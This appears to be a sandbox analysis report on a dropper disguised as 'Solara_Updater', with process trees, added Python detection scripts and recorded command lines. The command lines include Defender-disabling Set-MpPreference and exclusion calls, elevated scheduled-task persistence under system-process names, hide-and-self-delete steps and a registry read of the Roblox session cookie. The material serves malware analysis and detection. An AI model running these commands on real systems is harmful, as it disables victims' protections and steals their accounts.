Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2204 wrote to memory of 1332 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 2204 wrote to memory of 1332 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 2204 wrote to memory of 1332 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 2204 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2204 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2204 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2204 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2204 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 2204 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 2204 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 2888 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2888 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2888 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2888 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2364 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 2364 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 2364 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 2364 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2364 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2364 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2364 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2364 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 2364 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 2364 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 1332 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 1332 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 1332 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 1332 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
PID 1332 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
PID 1332 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
PID 2632 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2632 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2632 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2632 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2816 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 2816 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 2816 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 2816 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\system32\attrib.exe
PID 2816 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\system32\attrib.exe
PID 2816 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\system32\attrib.exe
PID 2816 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 720 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 720 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 720 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1212 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 1212 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 1212 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 1212 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 1212 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 1212 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 1212 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2552 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 2552 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 2552 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 1212 wrote to memory of 1136 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 1212 wrote to memory of 1136 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
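
The table above is the sandbox's flat, one-row-per-WriteProcessMemory-call view of process creation, so the same parent/child pair repeats and the tree is hard to read. The following is an added Python example for this report, not part of the sandbox output: it parses rows of that shape, collapses repeats into a per-edge write count, prints the tree rooted at each process whose parent is outside the table, and flags edges where a binary running from %TEMP% drives a Windows script host or admin tool. The rows in ROWS are a subset copied from the table above; the regex, the LOLBin list and the %TEMP% path check are this example's own assumptions.

```python
"""Rebuild the process tree from the flat 'wrote to memory' rows above.

Added example for this report; it is not part of the sandbox output.
ROWS is a subset copied from the table above (the sandbox emits one row
per WriteProcessMemory call, so the same parent/child pair repeats).
The parsing and the LOLBin list are this example's own assumptions.
"""
import re
from collections import defaultdict

ROWS = r"""
PID 2364 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 2364 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 2364 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 2364 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2364 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 1332 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 1332 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
PID 2632 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2816 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 2816 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\system32\attrib.exe
PID 2816 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1212 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 2552 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
""".strip()

# One row = "PID <writer> wrote to memory of <target> N/A <writer image> <target image>".
# The first path is matched non-greedily so the two ".exe" paths split at the
# separating space (assumes image paths without spaces, true for every row here).
EDGE_RE = re.compile(
    r"^PID (\d+) wrote to memory of (\d+) N/A ([A-Za-z]:\\.+?\.exe) ([A-Za-z]:\\.+\.exe)$"
)

# Windows binaries a dropper running from %TEMP% has no business driving (assumed list).
LOLBINS = {"wscript.exe", "cscript.exe", "powershell.exe", "wmic.exe", "cmd.exe",
           "attrib.exe", "schtasks.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1]


def parse_rows(text):
    """Return (names, edges): pid -> image path, and (writer, target) -> number of writes."""
    names, edges = {}, defaultdict(int)
    for line in text.splitlines():
        m = EDGE_RE.match(line.strip())
        if not m:
            continue  # header or unrelated row
        writer, target, writer_img, target_img = m.groups()
        writer, target = int(writer), int(target)
        names[writer] = writer_img
        names[target] = target_img
        edges[(writer, target)] += 1
    return names, dict(edges)


def build_tree(edges):
    """Roots are writers that never appear as a target: their parent is outside the table."""
    children = defaultdict(list)
    for parent, child in edges:
        children[parent].append(child)
    targets = {child for _, child in edges}
    roots = sorted({parent for parent, _ in edges} - targets)
    return roots, {p: sorted(c) for p, c in children.items()}


def render_tree(names, edges):
    """Indented text tree; repeated rows collapse into a per-edge write count."""
    roots, children = build_tree(edges)
    out = []

    def walk(pid, depth, writes):
        label = f"{'  ' * depth}{pid} {basename(names[pid])}"
        if writes:
            label += f"  [{writes} write(s) from parent]"
        out.append(label)
        for child in children.get(pid, []):
            walk(child, depth + 1, edges[(pid, child)])

    for root in roots:
        walk(root, 0, 0)
    return "\n".join(out)


def temp_to_lolbin(names, edges):
    """Edges where a binary in %TEMP% drives a LOLBin, as (writer, target, child name)."""
    hits = []
    for writer, target in sorted(edges):
        if ("\\appdata\\local\\temp\\" in names[writer].lower()
                and basename(names[target]).lower() in LOLBINS):
            hits.append((writer, target, basename(names[target])))
    return hits


if __name__ == "__main__":
    names, edges = parse_rows(ROWS)
    print(render_tree(names, edges))
    for writer, target, child in temp_to_lolbin(names, edges):
        print(f"TEMP binary {basename(names[writer])} ({writer}) -> {child} ({target})")
```

Two things to keep in mind when reading the result. Several writes into a freshly created child are normal for process creation, so these edges are best read as parent-to-child launches, not as proof of code injection on their own. And the table is partial: PID 1332 (a Loader.exe instance) is a writer but never a target, so its own parent is not recorded here and it comes out as a second root.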

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
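
The Processes list that follows is where the behaviour behind the summary's signature names can be read directly from command lines: Set-MpPreference and Add-MpPreference calls that switch off Defender features and exclude the dropped files, schtasks entries that relaunch svhost.exe every minute at highest privilege and plant copies named smss.exe, WmiPrvSE.exe and wscript.exe outside System32, attrib +h +s followed by a ping-then-delete self-removal, WMIC and registry fingerprinting, a read of the Roblox .ROBLOSECURITY cookie, runtime compilation through csc.exe, and a w32tm /stripchart call used as a delay. The following is an added Python example for this report, not sandbox logic, that maps such command lines to ATT&CK techniques and flags system-process names running from non-system directories. SAMPLE_CMDLINES is a subset copied from the list below; the rules, labels, directory whitelist and masqueraded-name list are this example's own assumptions.

```python
"""Map command lines from the Processes list to ATT&CK techniques.

Added example for this report, not sandbox logic. SAMPLE_CMDLINES is a
subset copied from the Processes list below; the rules, technique labels,
system directory whitelist and the list of impersonated process names are
this example's own assumptions.
"""
import re
from collections import Counter

SAMPLE_CMDLINES = r'''
"wmic.exe" csproduct get uuid
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\svhost.exe"
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause
"wmic" path win32_VideoController get name
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\smss.exe'" /rl HIGHEST /f
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zshxbpuc\zshxbpuc.cmdline"
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Common Files\Services\wscript.exe'" /rl HIGHEST /f
"wmic.exe" os get Caption
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
'''.strip().splitlines()

# (technique id, short label, pattern) -- labels are this example's wording.
RULES = [
    ("T1562.001", "Defender tampering via Set/Add-MpPreference",
     re.compile(r"\b(Set|Add)-MpPreference\b", re.I)),
    ("T1053.005", "scheduled task created",
     re.compile(r'\bschtasks(\.exe)?"?\s+/create\b', re.I)),
    ("T1564.001", "hidden/system attribute set on dropped file",
     re.compile(r'\battrib(\.exe)?"?\s+.*\+h\b', re.I)),
    ("T1070.004", "delayed self-deletion (ping && del)",
     re.compile(r"\bping\s+localhost\b.*&&\s*del\s+/F\b", re.I)),
    ("T1082", "hardware/OS fingerprinting via WMIC or registry",
     re.compile(r'\bwmic(\.exe)?"?\s+(csproduct|os|computersystem|path\s+win32_)|PROCESSOR_IDENTIFIER', re.I)),
    # The HKLN: typo is in the malware's own command line as recorded; key on the value name instead.
    ("T1552.002", "Roblox session cookie read from registry",
     re.compile(r"\.ROBLOSECURITY\b", re.I)),
    ("T1027.004", "compile after delivery via csc.exe",
     re.compile(r"\bcsc\.exe\b.*\.cmdline\b", re.I)),
    ("T1497.003", "time delay via w32tm /stripchart",
     re.compile(r"\bw32tm\s+/stripchart\b", re.I)),
    ("T1059.005", "script host running VBScript/VBE",
     re.compile(r"\b[wc]script\.exe\b.*\.(vbs|vbe)\b", re.I)),
    ("T1059.001", "PowerShell execution policy bypass",
     re.compile(r"-ExecutionPolicy\s+Bypass\b", re.I)),
]
WATCHDOG_RE = re.compile(r"/sc\s+minute\s+/mo\s+(\d+)", re.I)  # minute-interval relaunch
ELEVATED_RE = re.compile(r"/rl\s+highest\b", re.I)
PATH_RE = re.compile(r"""[A-Za-z]:\\[^"'\n]*?\.exe""", re.I)   # quoted or bare drive paths

# Names a dropped file borrows to blend in, and where the real ones live (assumed lists).
SYSTEM_NAMES = {"smss.exe", "csrss.exe", "wininit.exe", "services.exe", "lsass.exe",
                "svchost.exe", "svhost.exe", "wmiprvse.exe", "wscript.exe", "cscript.exe"}
SYSTEM_DIRS = {"c:\\windows\\system32", "c:\\windows\\syswow64", "c:\\windows\\system32\\wbem"}


def masquerades(cmdline):
    """Paths whose file name copies a system process but whose folder is not a system folder."""
    hits = []
    for path in PATH_RE.findall(cmdline):
        folder, _, name = path.rpartition("\\")
        if name.lower() in SYSTEM_NAMES and folder.lower() not in SYSTEM_DIRS:
            hits.append(path)
    return hits


def triage(cmdline):
    """Return [(technique, detail), ...] for one command line, rule order first."""
    findings = [(tech, label) for tech, label, rx in RULES if rx.search(cmdline)]
    m = WATCHDOG_RE.search(cmdline)
    if m and ELEVATED_RE.search(cmdline):
        findings.append(("T1053.005", f"elevated relaunch every {m.group(1)} min (watchdog task)"))
    for path in masquerades(cmdline):
        findings.append(("T1036.005", f"system-process name outside a system folder: {path}"))
    return findings


def technique_counts(cmdlines):
    """Technique id -> number of findings across all command lines."""
    counts = Counter(tech for c in cmdlines for tech, _ in triage(c))
    return dict(counts)


if __name__ == "__main__":
    for cmd in SAMPLE_CMDLINES:
        for tech, detail in triage(cmd):
            print(f"{tech:10} {detail:60} {cmd[:70]}")
    print(technique_counts(SAMPLE_CMDLINES))
```

Two practical points fall out of the findings. The svhost task (`/sc minute /mo 1 /RL HIGHEST`) restarts the payload every minute, so killing the process without deleting the task and the file in Roaming is not a cleanup. And the Set-MpPreference line only succeeds where Defender's tamper protection is off; the sandbox records the attempt, not whether it took effect, so treat the command line itself as the indicator.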

Processes

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\system32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svhost.exe'

C:\Windows\system32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe'

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

